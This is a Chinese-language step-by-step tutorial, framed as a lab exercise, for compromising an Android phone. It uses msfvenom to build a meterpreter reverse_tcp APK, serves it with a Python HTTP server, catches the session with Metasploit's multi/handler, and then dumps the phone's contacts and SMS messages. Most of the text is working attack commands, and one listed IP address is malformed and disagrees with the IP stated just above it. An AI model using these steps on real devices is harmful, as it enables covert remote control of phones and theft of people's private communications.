安卓手机入侵实验
要求:
电脑主机与手机模拟器或者真机在当前环境下,网络是畅通的,相互之间可以进行通信。
如何进行测试网络环境:
我们首先需要确定IP。
linux通过终端命令 # ip a 或者 #ifconfig
windown下:win加r输入cmd调出终端,使用ipconfig查看ip地址。
kali下:
Android模拟器下:
在安卓真机下:打开wifi
操作:
知道IP后使用ping命令测试是否可以连通。
终端下命令:
ping 目标主机ip
测试步骤:
可以ping通后开始进行入侵测试:
- 使用msfvenom生成一个连接kali主机的apk安卓应用
lhost=192.168.1.10 (这是Kali的IP),lport=4444 (默认4444)端口,1.apk(生成apk的名字)
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.116.1354 lport=4444 R > 1.apk
home下点开test
apk安卓应用上传到安卓手机
步骤一:kali开启HTTP服务80端口
命令:
python3 -m http.server 80
步骤二:安卓下通过ip访问网站下载
模拟器下有bug可以通过
终端下命令:切换路径 cd /sdcard
开始下载 wget ip/apk文件
真机可以直接浏览器下输入ip地址访问
安卓下载安装完成并且给与程序权限
3. 回到kali
输入命令启动msfconsole
-
选择工具模块
命令:
use exploit/multi/handler
-
设置攻击载荷
set payload android/meterpreter/reverse_tcp
-
设置监听方ip地址(kali的IP地址)
set LHOST ip
-
设置端口
set LPORT 4444
-
run运行
-
回到安卓点击安装的程序
-
kali下可以执行操作了
查看目标安卓手机通讯录:dump_contacts
完成后的文件保存在home,目录下
查看目标手机短信 :dump_sms
至此操作完成
补充:
可以使用help 查看命令帮助